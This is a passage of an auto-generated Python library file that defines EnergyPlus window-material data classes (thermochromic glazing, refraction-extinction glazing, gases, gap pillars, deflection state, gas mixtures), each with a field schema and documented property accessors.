Returns:
float: the value of `back_side_infrared_hemispherical_emissivity` or None if not set
"""
return self["Back Side Infrared Hemispherical Emissivity"]
@back_side_infrared_hemispherical_emissivity.setter
def back_side_infrared_hemispherical_emissivity(self, value=0.84):
"""Corresponds to IDD field `Back Side Infrared Hemispherical
Emissivity`"""
self["Back Side Infrared Hemispherical Emissivity"] = value
@property
def conductivity(self):
"""field `Conductivity`
| Units: W/m-K
| Default value: 0.9
Args:
value (float): value for IDD Field `Conductivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `conductivity` or None if not set
"""
return self["Conductivity"]
@conductivity.setter
def conductivity(self, value=0.9):
"""Corresponds to IDD field `Conductivity`"""
self["Conductivity"] = value
@property
def dirt_correction_factor_for_solar_and_visible_transmittance(self):
"""field `Dirt Correction Factor for Solar and Visible Transmittance`
| Default value: 1.0
| value <= 1.0
Args:
value (float): value for IDD Field `Dirt Correction Factor for Solar and Visible Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `dirt_correction_factor_for_solar_and_visible_transmittance` or None if not set
"""
return self[
"Dirt Correction Factor for Solar and Visible Transmittance"]
@dirt_correction_factor_for_solar_and_visible_transmittance.setter
def dirt_correction_factor_for_solar_and_visible_transmittance(
self,
value=1.0):
"""Corresponds to IDD field `Dirt Correction Factor for Solar and
Visible Transmittance`"""
self[
"Dirt Correction Factor for Solar and Visible Transmittance"] = value
@property
def solar_diffusing(self):
"""field `Solar Diffusing`
| Default value: No
Args:
value (str): value for IDD Field `Solar Diffusing`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `solar_diffusing` or None if not set
"""
return self["Solar Diffusing"]
@solar_diffusing.setter
def solar_diffusing(self, value="No"):
"""Corresponds to IDD field `Solar Diffusing`"""
self["Solar Diffusing"] = value
@property
def youngs_modulus(self):
"""field `Young's modulus`
| coefficient used for deflection calculations. Used only with complex
| fenestration when deflection model is set to TemperatureAndPressureInput
| Units: Pa
| Default value: 72000000000.0
Args:
value (float): value for IDD Field `Young's modulus`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `youngs_modulus` or None if not set
"""
return self["Young's modulus"]
@youngs_modulus.setter
def youngs_modulus(self, value=72000000000.0):
"""Corresponds to IDD field `Young's modulus`"""
self["Young's modulus"] = value
@property
def poissons_ratio(self):
"""field `Poisson's ratio`
| coefficient used for deflection calculations. Used only with complex
| fenestration when deflection model is set to TemperatureAndPressureInput
| Default value: 0.22
| value < 1.0
Args:
value (float): value for IDD Field `Poisson's ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `poissons_ratio` or None if not set
"""
return self["Poisson's ratio"]
@poissons_ratio.setter
def poissons_ratio(self, value=0.22):
"""Corresponds to IDD field `Poisson's ratio`"""
self["Poisson's ratio"] = value
class WindowMaterialGlazingGroupThermochromic(DataObject):
""" Corresponds to IDD object `WindowMaterial:GlazingGroup:Thermochromic`
thermochromic glass at different temperatures
"""
_schema = {'extensible-fields': OrderedDict([(u'optical data temperature 1',
{'name': u'Optical Data Temperature 1',
'pyname': u'optical_data_temperature_1',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'window material glazing name 1',
{'name': u'Window Material Glazing Name 1',
'pyname': u'window_material_glazing_name_1',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 3,
'name': u'WindowMaterial:GlazingGroup:Thermochromic',
'pyname': u'WindowMaterialGlazingGroupThermochromic',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
def add_extensible(self,
optical_data_temperature_1=None,
window_material_glazing_name_1=None,
):
"""Add values for extensible fields.
Args:
optical_data_temperature_1 (float): value for IDD Field `Optical Data Temperature 1`
Units: C
IP-Units: F
if `value` is None it will not be checked against the
specification and is assumed to be a missing value
window_material_glazing_name_1 (str): value for IDD Field `Window Material Glazing Name 1`
if `value` is None it will not be checked against the
specification and is assumed to be a missing value
"""
vals = []
optical_data_temperature_1 = self.check_value(
"Optical Data Temperature 1",
optical_data_temperature_1)
vals.append(optical_data_temperature_1)
window_material_glazing_name_1 = self.check_value(
"Window Material Glazing Name 1",
window_material_glazing_name_1)
vals.append(window_material_glazing_name_1)
self._extdata.append(vals)
@property
def extensibles(self):
"""Get list of all extensibles."""
return self._extdata
@extensibles.setter
def extensibles(self, extensibles):
"""Replaces extensible fields with `extensibles`
Args:
extensibles (list): nested list of extensible values
"""
self._extdata = []
for ext in extensibles:
self.add_extensible(*ext)
class WindowMaterialGlazingRefractionExtinctionMethod(DataObject):
""" Corresponds to IDD object `WindowMaterial:Glazing:RefractionExtinctionMethod`
Glass material properties for Windows or Glass Doors
Index of Refraction/Extinction Coefficient input method
Not to be used for coated glass
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'thickness',
{'name': u'Thickness',
'pyname': u'thickness',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'solar index of refraction',
{'name': u'Solar Index of Refraction',
'pyname': u'solar_index_of_refraction',
'minimum>': 1.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'solar extinction coefficient',
{'name': u'Solar Extinction Coefficient',
'pyname': u'solar_extinction_coefficient',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'1/m'}),
(u'visible index of refraction',
{'name': u'Visible Index of Refraction',
'pyname': u'visible_index_of_refraction',
'minimum>': 1.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'visible extinction coefficient',
{'name': u'Visible Extinction Coefficient',
'pyname': u'visible_extinction_coefficient',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'1/m'}),
(u'infrared transmittance at normal incidence',
{'name': u'Infrared Transmittance at Normal Incidence',
'pyname': u'infrared_transmittance_at_normal_incidence',
'default': 0.0,
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'infrared hemispherical emissivity',
{'name': u'Infrared Hemispherical Emissivity',
'pyname': u'infrared_hemispherical_emissivity',
'default': 0.84,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'maximum<': 1.0}),
(u'conductivity',
{'name': u'Conductivity',
'pyname': u'conductivity',
'default': 0.9,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'dirt correction factor for solar and visible transmittance',
{'name': u'Dirt Correction Factor for Solar and Visible Transmittance',
'pyname': u'dirt_correction_factor_for_solar_and_visible_transmittance',
'default': 1.0,
'minimum>': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'solar diffusing',
{'name': u'Solar Diffusing',
'pyname': u'solar_diffusing',
'default': u'No',
'required-field': False,
'autosizable': False,
'accepted-values': [u'No',
u'Yes'],
'autocalculatable': False,
'type': 'alpha'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'WindowMaterial:Glazing:RefractionExtinctionMethod',
'pyname': u'WindowMaterialGlazingRefractionExtinctionMethod',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def thickness(self):
"""field `Thickness`
| Units: m
| IP-Units: in
Args:
value (float): value for IDD Field `Thickness`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thickness` or None if not set
"""
return self["Thickness"]
@thickness.setter
def thickness(self, value=None):
"""Corresponds to IDD field `Thickness`"""
self["Thickness"] = value
@property
def solar_index_of_refraction(self):
"""field `Solar Index of Refraction`
| value > 1.0
Args:
value (float): value for IDD Field `Solar Index of Refraction`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `solar_index_of_refraction` or None if not set
"""
return self["Solar Index of Refraction"]
@solar_index_of_refraction.setter
def solar_index_of_refraction(self, value=None):
"""Corresponds to IDD field `Solar Index of Refraction`"""
self["Solar Index of Refraction"] = value
@property
def solar_extinction_coefficient(self):
"""field `Solar Extinction Coefficient`
| Units: 1/m
Args:
value (float): value for IDD Field `Solar Extinction Coefficient`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `solar_extinction_coefficient` or None if not set
"""
return self["Solar Extinction Coefficient"]
@solar_extinction_coefficient.setter
def solar_extinction_coefficient(self, value=None):
"""Corresponds to IDD field `Solar Extinction Coefficient`"""
self["Solar Extinction Coefficient"] = value
@property
def visible_index_of_refraction(self):
"""field `Visible Index of Refraction`
| value > 1.0
Args:
value (float): value for IDD Field `Visible Index of Refraction`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `visible_index_of_refraction` or None if not set
"""
return self["Visible Index of Refraction"]
@visible_index_of_refraction.setter
def visible_index_of_refraction(self, value=None):
"""Corresponds to IDD field `Visible Index of Refraction`"""
self["Visible Index of Refraction"] = value
@property
def visible_extinction_coefficient(self):
"""field `Visible Extinction Coefficient`
| Units: 1/m
Args:
value (float): value for IDD Field `Visible Extinction Coefficient`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `visible_extinction_coefficient` or None if not set
"""
return self["Visible Extinction Coefficient"]
@visible_extinction_coefficient.setter
def visible_extinction_coefficient(self, value=None):
"""Corresponds to IDD field `Visible Extinction Coefficient`"""
self["Visible Extinction Coefficient"] = value
@property
def infrared_transmittance_at_normal_incidence(self):
"""field `Infrared Transmittance at Normal Incidence`
| value < 1.0
Args:
value (float): value for IDD Field `Infrared Transmittance at Normal Incidence`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `infrared_transmittance_at_normal_incidence` or None if not set
"""
return self["Infrared Transmittance at Normal Incidence"]
@infrared_transmittance_at_normal_incidence.setter
def infrared_transmittance_at_normal_incidence(self, value=None):
"""Corresponds to IDD field `Infrared Transmittance at Normal
Incidence`"""
self["Infrared Transmittance at Normal Incidence"] = value
@property
def infrared_hemispherical_emissivity(self):
"""field `Infrared Hemispherical Emissivity`
| Emissivity of front and back side assumed equal
| Default value: 0.84
| value < 1.0
Args:
value (float): value for IDD Field `Infrared Hemispherical Emissivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `infrared_hemispherical_emissivity` or None if not set
"""
return self["Infrared Hemispherical Emissivity"]
@infrared_hemispherical_emissivity.setter
def infrared_hemispherical_emissivity(self, value=0.84):
"""Corresponds to IDD field `Infrared Hemispherical Emissivity`"""
self["Infrared Hemispherical Emissivity"] = value
@property
def conductivity(self):
"""field `Conductivity`
| Units: W/m-K
| Default value: 0.9
Args:
value (float): value for IDD Field `Conductivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `conductivity` or None if not set
"""
return self["Conductivity"]
@conductivity.setter
def conductivity(self, value=0.9):
"""Corresponds to IDD field `Conductivity`"""
self["Conductivity"] = value
@property
def dirt_correction_factor_for_solar_and_visible_transmittance(self):
"""field `Dirt Correction Factor for Solar and Visible Transmittance`
| Default value: 1.0
| value <= 1.0
Args:
value (float): value for IDD Field `Dirt Correction Factor for Solar and Visible Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `dirt_correction_factor_for_solar_and_visible_transmittance` or None if not set
"""
return self[
"Dirt Correction Factor for Solar and Visible Transmittance"]
@dirt_correction_factor_for_solar_and_visible_transmittance.setter
def dirt_correction_factor_for_solar_and_visible_transmittance(
self,
value=1.0):
"""Corresponds to IDD field `Dirt Correction Factor for Solar and
Visible Transmittance`"""
self[
"Dirt Correction Factor for Solar and Visible Transmittance"] = value
@property
def solar_diffusing(self):
"""field `Solar Diffusing`
| Default value: No
Args:
value (str): value for IDD Field `Solar Diffusing`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `solar_diffusing` or None if not set
"""
return self["Solar Diffusing"]
@solar_diffusing.setter
def solar_diffusing(self, value="No"):
"""Corresponds to IDD field `Solar Diffusing`"""
self["Solar Diffusing"] = value
class WindowMaterialGas(DataObject):
""" Corresponds to IDD object `WindowMaterial:Gas`
Gas material properties that are used in Windows or Glass Doors
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'gas type',
{'name': u'Gas Type',
'pyname': u'gas_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Air',
u'Argon',
u'Krypton',
u'Xenon',
u'Custom'],
'autocalculatable': False,
'type': 'alpha'}),
(u'thickness',
{'name': u'Thickness',
'pyname': u'thickness',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'conductivity coefficient a',
{'name': u'Conductivity Coefficient A',
'pyname': u'conductivity_coefficient_a',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'conductivity coefficient b',
{'name': u'Conductivity Coefficient B',
'pyname': u'conductivity_coefficient_b',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K2'}),
(u'conductivity coefficient c',
{'name': u'Conductivity Coefficient C',
'pyname': u'conductivity_coefficient_c',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K3'}),
(u'viscosity coefficient a',
{'name': u'Viscosity Coefficient A',
'pyname': u'viscosity_coefficient_a',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'kg/m-s'}),
(u'viscosity coefficient b',
{'name': u'Viscosity Coefficient B',
'pyname': u'viscosity_coefficient_b',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'kg/m-s-K'}),
(u'viscosity coefficient c',
{'name': u'Viscosity Coefficient C',
'pyname': u'viscosity_coefficient_c',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'kg/m-s-K2'}),
(u'specific heat coefficient a',
{'name': u'Specific Heat Coefficient A',
'pyname': u'specific_heat_coefficient_a',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg-K'}),
(u'specific heat coefficient b',
{'name': u'Specific Heat Coefficient B',
'pyname': u'specific_heat_coefficient_b',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg-K2'}),
(u'specific heat coefficient c',
{'name': u'Specific Heat Coefficient C',
'pyname': u'specific_heat_coefficient_c',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg-K3'}),
(u'molecular weight',
{'name': u'Molecular Weight',
'pyname': u'molecular_weight',
'maximum': 200.0,
'required-field': False,
'autosizable': False,
'minimum': 20.0,
'autocalculatable': False,
'type': u'real',
'unit': u'g/mol'}),
(u'specific heat ratio',
{'name': u'Specific Heat Ratio',
'pyname': u'specific_heat_ratio',
'minimum>': 1.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 3,
'name': u'WindowMaterial:Gas',
'pyname': u'WindowMaterialGas',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def gas_type(self):
"""field `Gas Type`
Args:
value (str): value for IDD Field `Gas Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `gas_type` or None if not set
"""
return self["Gas Type"]
@gas_type.setter
def gas_type(self, value=None):
"""Corresponds to IDD field `Gas Type`"""
self["Gas Type"] = value
@property
def thickness(self):
"""field `Thickness`
| Units: m
| IP-Units: in
Args:
value (float): value for IDD Field `Thickness`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thickness` or None if not set
"""
return self["Thickness"]
@thickness.setter
def thickness(self, value=None):
"""Corresponds to IDD field `Thickness`"""
self["Thickness"] = value
@property
def conductivity_coefficient_a(self):
"""field `Conductivity Coefficient A`
| Used only if Gas Type = Custom
| Units: W/m-K
Args:
value (float): value for IDD Field `Conductivity Coefficient A`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `conductivity_coefficient_a` or None if not set
"""
return self["Conductivity Coefficient A"]
@conductivity_coefficient_a.setter
def conductivity_coefficient_a(self, value=None):
"""Corresponds to IDD field `Conductivity Coefficient A`"""
self["Conductivity Coefficient A"] = value
@property
def conductivity_coefficient_b(self):
"""field `Conductivity Coefficient B`
| Used only if Gas Type = Custom
| Units: W/m-K2
Args:
value (float): value for IDD Field `Conductivity Coefficient B`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `conductivity_coefficient_b` or None if not set
"""
return self["Conductivity Coefficient B"]
@conductivity_coefficient_b.setter
def conductivity_coefficient_b(self, value=None):
"""Corresponds to IDD field `Conductivity Coefficient B`"""
self["Conductivity Coefficient B"] = value
@property
def conductivity_coefficient_c(self):
"""field `Conductivity Coefficient C`
| Used only if Gas Type = Custom
| Units: W/m-K3
Args:
value (float): value for IDD Field `Conductivity Coefficient C`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `conductivity_coefficient_c` or None if not set
"""
return self["Conductivity Coefficient C"]
@conductivity_coefficient_c.setter
def conductivity_coefficient_c(self, value=None):
"""Corresponds to IDD field `Conductivity Coefficient C`"""
self["Conductivity Coefficient C"] = value
@property
def viscosity_coefficient_a(self):
"""field `Viscosity Coefficient A`
| Used only if Gas Type = Custom
| Units: kg/m-s
Args:
value (float): value for IDD Field `Viscosity Coefficient A`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `viscosity_coefficient_a` or None if not set
"""
return self["Viscosity Coefficient A"]
@viscosity_coefficient_a.setter
def viscosity_coefficient_a(self, value=None):
"""Corresponds to IDD field `Viscosity Coefficient A`"""
self["Viscosity Coefficient A"] = value
@property
def viscosity_coefficient_b(self):
"""field `Viscosity Coefficient B`
| Used only if Gas Type = Custom
| Units: kg/m-s-K
Args:
value (float): value for IDD Field `Viscosity Coefficient B`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `viscosity_coefficient_b` or None if not set
"""
return self["Viscosity Coefficient B"]
@viscosity_coefficient_b.setter
def viscosity_coefficient_b(self, value=None):
"""Corresponds to IDD field `Viscosity Coefficient B`"""
self["Viscosity Coefficient B"] = value
@property
def viscosity_coefficient_c(self):
"""field `Viscosity Coefficient C`
| Used only if Gas Type = Custom
| Units: kg/m-s-K2
Args:
value (float): value for IDD Field `Viscosity Coefficient C`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `viscosity_coefficient_c` or None if not set
"""
return self["Viscosity Coefficient C"]
@viscosity_coefficient_c.setter
def viscosity_coefficient_c(self, value=None):
"""Corresponds to IDD field `Viscosity Coefficient C`"""
self["Viscosity Coefficient C"] = value
@property
def specific_heat_coefficient_a(self):
"""field `Specific Heat Coefficient A`
| Used only if Gas Type = Custom
| Units: J/kg-K
Args:
value (float): value for IDD Field `Specific Heat Coefficient A`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `specific_heat_coefficient_a` or None if not set
"""
return self["Specific Heat Coefficient A"]
@specific_heat_coefficient_a.setter
def specific_heat_coefficient_a(self, value=None):
"""Corresponds to IDD field `Specific Heat Coefficient A`"""
self["Specific Heat Coefficient A"] = value
@property
def specific_heat_coefficient_b(self):
"""field `Specific Heat Coefficient B`
| Used only if Gas Type = Custom
| Units: J/kg-K2
Args:
value (float): value for IDD Field `Specific Heat Coefficient B`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `specific_heat_coefficient_b` or None if not set
"""
return self["Specific Heat Coefficient B"]
@specific_heat_coefficient_b.setter
def specific_heat_coefficient_b(self, value=None):
"""Corresponds to IDD field `Specific Heat Coefficient B`"""
self["Specific Heat Coefficient B"] = value
@property
def specific_heat_coefficient_c(self):
"""field `Specific Heat Coefficient C`
| Used only if Gas Type = Custom
| Units: J/kg-K3
Args:
value (float): value for IDD Field `Specific Heat Coefficient C`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `specific_heat_coefficient_c` or None if not set
"""
return self["Specific Heat Coefficient C"]
@specific_heat_coefficient_c.setter
def specific_heat_coefficient_c(self, value=None):
"""Corresponds to IDD field `Specific Heat Coefficient C`"""
self["Specific Heat Coefficient C"] = value
@property
def molecular_weight(self):
"""field `Molecular Weight`
| Used only if Gas Type = Custom
| Units: g/mol
| value >= 20.0
| value <= 200.0
Args:
value (float): value for IDD Field `Molecular Weight`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `molecular_weight` or None if not set
"""
return self["Molecular Weight"]
@molecular_weight.setter
def molecular_weight(self, value=None):
"""Corresponds to IDD field `Molecular Weight`"""
self["Molecular Weight"] = value
@property
def specific_heat_ratio(self):
"""field `Specific Heat Ratio`
| Used only if Gas Type = Custom
| value > 1.0
Args:
value (float): value for IDD Field `Specific Heat Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `specific_heat_ratio` or None if not set
"""
return self["Specific Heat Ratio"]
@specific_heat_ratio.setter
def specific_heat_ratio(self, value=None):
"""Corresponds to IDD field `Specific Heat Ratio`"""
self["Specific Heat Ratio"] = value
class WindowGapSupportPillar(DataObject):
""" Corresponds to IDD object `WindowGap:SupportPillar`
used to define pillar geometry for support pillars
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'spacing',
{'name': u'Spacing',
'pyname': u'spacing',
'default': 0.04,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'radius',
{'name': u'Radius',
'pyname': u'radius',
'default': 0.0004,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'WindowGap:SupportPillar',
'pyname': u'WindowGapSupportPillar',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def spacing(self):
"""field `Spacing`
| Units: m
| Default value: 0.04
Args:
value (float): value for IDD Field `Spacing`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `spacing` or None if not set
"""
return self["Spacing"]
@spacing.setter
def spacing(self, value=0.04):
"""Corresponds to IDD field `Spacing`"""
self["Spacing"] = value
@property
def radius(self):
"""field `Radius`
| Units: m
| Default value: 0.0004
Args:
value (float): value for IDD Field `Radius`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `radius` or None if not set
"""
return self["Radius"]
@radius.setter
def radius(self, value=0.0004):
"""Corresponds to IDD field `Radius`"""
self["Radius"] = value
class WindowGapDeflectionState(DataObject):
""" Corresponds to IDD object `WindowGap:DeflectionState`
Used to enter data describing deflection state of the gap. It is referenced from
WindowMaterial:Gap object only and it is used only when deflection model is set to
MeasuredDeflection, otherwise it is ignored.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'deflected thickness',
{'name': u'Deflected Thickness',
'pyname': u'deflected_thickness',
'default': 0.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'initial temperature',
{'name': u'Initial Temperature',
'pyname': u'initial_temperature',
'default': 25.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'initial pressure',
{'name': u'Initial Pressure',
'pyname': u'initial_pressure',
'default': 101325.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'Pa'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'WindowGap:DeflectionState',
'pyname': u'WindowGapDeflectionState',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def deflected_thickness(self):
"""field `Deflected Thickness`
| If left blank will be considered that gap has no deflection.
| Units: m
Args:
value (float): value for IDD Field `Deflected Thickness`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `deflected_thickness` or None if not set
"""
return self["Deflected Thickness"]
@deflected_thickness.setter
def deflected_thickness(self, value=None):
"""Corresponds to IDD field `Deflected Thickness`"""
self["Deflected Thickness"] = value
@property
def initial_temperature(self):
"""field `Initial Temperature`
| Units: C
| Default value: 25.0
Args:
value (float): value for IDD Field `Initial Temperature`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `initial_temperature` or None if not set
"""
return self["Initial Temperature"]
@initial_temperature.setter
def initial_temperature(self, value=25.0):
"""Corresponds to IDD field `Initial Temperature`"""
self["Initial Temperature"] = value
@property
def initial_pressure(self):
"""field `Initial Pressure`
| Units: Pa
| Default value: 101325.0
Args:
value (float): value for IDD Field `Initial Pressure`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `initial_pressure` or None if not set
"""
return self["Initial Pressure"]
@initial_pressure.setter
def initial_pressure(self, value=101325.0):
"""Corresponds to IDD field `Initial Pressure`"""
self["Initial Pressure"] = value
class WindowMaterialGasMixture(DataObject):
""" Corresponds to IDD object `WindowMaterial:GasMixture`
Gas mixtures that are used in Windows or Glass Doors
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'thickness',
{'name': u'Thickness',
'pyname': u'thickness',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'number of gases in mixture',
{'name': u'Number of Gases in Mixture',
'pyname': u'number_of_gases_in_mixture',
'maximum': 4,
'required-field': True,
'autosizable': False,
'minimum': 1,
'autocalculatable': False,
'type': u'integer'}),
(u'gas 1 type',
{'name': u'Gas 1 Type',
'pyname': u'gas_1_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Air',
u'Argon',
u'Krypton',
u'Xenon'],
'autocalculatable': False,
'type': 'alpha'}),
(u'gas 1 fraction',
{'name': u'Gas 1 Fraction',
'pyname': u'gas_1_fraction',
'minimum>': 0.0,
'maximum': 1.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'gas 2 type',
{'name': u'Gas 2 Type',
'pyname': u'gas_2_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Air',
u'Argon',
u'Krypton',
u'Xenon'],
'autocalculatable': False,
'type': 'alpha'}),
(u'gas 2 fraction',
{'name': u'Gas 2 Fraction',
'pyname': u'gas_2_fraction',
'minimum>': 0.0,
'maximum': 1.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'gas 3 type',
{'name': u'Gas 3 Type',
'pyname': u'gas_3_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Air',
u'Argon',
u'Krypton',
u'Xenon'],
'autocalculatable': False,
'type': 'alpha'}),
(u'gas 3 fraction',
{'name': u'Gas 3 Fraction',
'pyname': u'gas_3_fraction',
'minimum>': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'gas 4 type',
{'name': u'Gas 4 Type',
'pyname': u'gas_4_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Air',
u'Argon',
u'Krypton',
u'Xenon'],
'autocalculatable': False,
'type': 'alpha'}),
(u'gas 4 fraction',
{'name': u'Gas 4 Fraction',
'pyname': u'gas_4_fraction',
'minimum>': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 7,
'name': u'WindowMaterial:GasMixture',
'pyname': u'WindowMaterialGasMixture',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
